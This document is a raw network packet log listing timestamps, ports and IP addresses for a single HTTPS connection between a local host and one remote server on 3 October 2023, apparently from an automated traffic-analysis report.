Oct 3, 2023 22:34:59.046329975 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.046415091 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.046426058 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.046489954 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.047018051 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.047375917 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.047395945 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.047456026 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.047466040 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.047501087 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.047524929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.048161030 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.049004078 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.049026012 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.049098015 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.049108982 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.049139977 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.049163103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.057185888 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.079579115 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.079600096 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.079796076 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.079858065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.079930067 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.080738068 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.080760956 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.080827951 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.080841064 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.080871105 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.080893993 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.081676006 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.081701040 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.081760883 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.081772089 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.081803083 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.081835985 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.122158051 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.122188091 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.122301102 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.122330904 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.122518063 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.138571024 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.138607025 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.138961077 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.139019966 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.139069080 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.139172077 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.139308929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.139308929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.139308929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.139373064 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.139480114 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.139869928 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.139899015 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.140208006 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.140268087 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.140367031 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.140536070 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.140557051 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.140615940 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.140630960 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.140661001 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.140693903 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.141628027 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.141652107 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.141724110 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.141736031 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.141762018 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.141801119 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142362118 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142390013 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142446995 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142457962 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142484903 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142533064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142811060 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142837048 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142896891 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142908096 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.142934084 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.142971992 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.143222094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143248081 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143302917 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.143313885 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143341064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.143450975 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.143704891 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143728971 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143789053 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.143800974 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.143906116 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144257069 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144284010 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144340038 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144350052 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144386053 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144424915 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144689083 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144710064 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144782066 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144792080 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.144829988 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.144867897 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145155907 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145178080 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145248890 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145261049 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145320892 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145641088 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145664930 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145723104 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145735025 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.145761013 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145793915 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.145970106 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146176100 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146195889 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146265030 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146275043 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146315098 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146337032 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146698952 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146722078 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146778107 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146787882 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.146822929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.146852016 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147114992 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147147894 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147171974 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147224903 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147238016 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147273064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147293091 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147495985 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147515059 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147564888 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147576094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147612095 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147639036 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147877932 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147905111 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.147958994 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.147969961 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.148004055 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.148041964 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.148469925 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.148488045 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.148535967 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.148546934 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.148585081 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.148610115 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.148880005 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.179234028 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179266930 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179605961 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.179665089 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179745913 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.179807901 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179826975 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179877996 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.179889917 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.179919004 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.179954052 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.180387974 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.180418968 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.180481911 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.180494070 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.180527925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.180557013 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.181160927 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.181180954 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.181235075 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.181246042 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.181282997 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.181303024 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.181847095 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.181869030 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.181946039 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.181957006 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.182019949 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.182462931 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.182482958 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.182553053 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.182564020 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.182631969 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.182997942 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.183017015 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.183084011 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.183100939 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.183159113 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.222055912 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.222080946 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.222178936 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.222245932 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.222290039 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.222313881 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.248071909 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.248099089 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.248245955 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.248306036 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.248393059 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.249260902 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.249277115 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.249401093 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.249414921 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.249484062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.250461102 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.250530958 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.250593901 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.250607014 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.250654936 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.250679016 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.251434088 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.251478910 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.251523972 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.251533985 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.251562119 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.251585007 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.252167940 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.252208948 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.252268076 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.252279043 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.252321959 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.252341032 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.253120899 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.253179073 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.253221035 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.253232002 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.253273010 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.253292084 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.254113913 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.254165888 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.254218102 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.254229069 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.254256010 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.254292965 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.255043030 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.255100965 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.255142927 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.255152941 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.255178928 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.255209923 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.255969048 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.256017923 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.256068945 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.256079912 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.256105900 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.256134033 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.256941080 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.256994963 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.257047892 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.257057905 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.257095098 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.257121086 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.257821083 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.257872105 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.257913113 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.257922888 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.257980108 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.257997036 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.258629084 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.258682013 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.258723974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.258734941 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.258761883 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.258793116 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.259502888 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.259542942 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.259591103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.259601116 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.259634972 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.259670019 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.260510921 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.260588884 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.260616064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.260627031 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.260658979 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.260689020 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.261449099 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.261497974 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.261539936 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.261550903 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.261583090 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.261605024 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.262528896 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.262573957 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.262618065 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.262628078 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.262670040 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.262690067 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.263812065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.263853073 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.263899088 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.263909101 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.263945103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.263983011 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.265016079 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.265060902 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.265105963 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.265116930 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.265151024 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.265172958 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.265979052 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.266021013 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.266067982 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.266078949 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.266108036 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.266134024 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.267086983 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267128944 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267174006 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.267184973 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267210007 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.267232895 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.267853022 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267899990 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267942905 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.267952919 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.267987013 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.268016100 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.269207001 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.269249916 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.269294977 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.269305944 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.269346952 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.269368887 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.270344973 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.270385981 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.270442963 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.270456076 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.270483017 CEST	49776	443	192.168.2.4	136.144.57.121
